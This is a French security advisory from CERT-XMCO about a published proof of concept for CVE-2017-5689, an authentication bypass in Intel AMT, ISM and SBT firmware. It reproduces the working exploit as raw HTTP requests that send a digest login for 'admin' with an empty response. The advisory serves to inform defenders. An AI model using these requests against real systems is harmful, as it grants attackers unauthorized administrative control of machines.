Le CERT-XMCO vous partage une information ayant fait l’actualité durant la semaine écoulée. Nous vous proposons de revenir sur la publication d’un code d’exploitation affectant des processeurs Intel. Il permet d’exploiter une vulnérabilité au sein des firmwares, permettant à un attaquant d’exécuter du code sur la machine ciblée.
Description :
Une preuve de concept, exploitant la vulnérabilité présentée dans le bulletin CXA-2017-1707, a été publiée.
La vulnérabilité en question, référencée CVE-2017-5689, affecte tous les processeurs Intel (firmwares Intel ISM (Standard Mangeability), SBT (Small Business Technology) et AMT (Active Management Technology)). L’exploitation de cette faille permet de contourner le système d’authentification du produit.
La preuve de concept se matérialise sous la forme d’une requête Web. Cette dernière permet d’envoyer une requête d’accès à l’interface via le compte « admin », en fournissant un mot de passe vide. Un attaquant est alors capable d’accéder à l’interface d’administration du produit, lui permettant d’exécuter des commandes arbitraires avec les droits SYSTEM.
Code d’exploitation :
GET /index.htm HTTP/1.1 Host: 127.0.0.1:16992 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 401 Unauthorized WWW-Authenticate: Digest realm=»Digest:048A0000000000000000000000000000», nonce=»qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n»,stale=»false»,qop=»auth» Content-Type: text/html Server: AMT Content-Length: 678 Connection: close GET /index.htm HTTP/1.1 Host: 127.0.0.1:16992 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Authorization: Digest username=»admin», realm=»Digest:048A0000000000000000000000000000», nonce=»qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n», uri=»/index.htm», response=»», qop=auth, nc=00000001, cnonce=»60513ab58858482c»
Recommandation :
Aucun correctif n’est actuellement disponible. Cependant, Intel propose un module de détection de la vulnérabilité disponible à l’adresse suivante :
Références :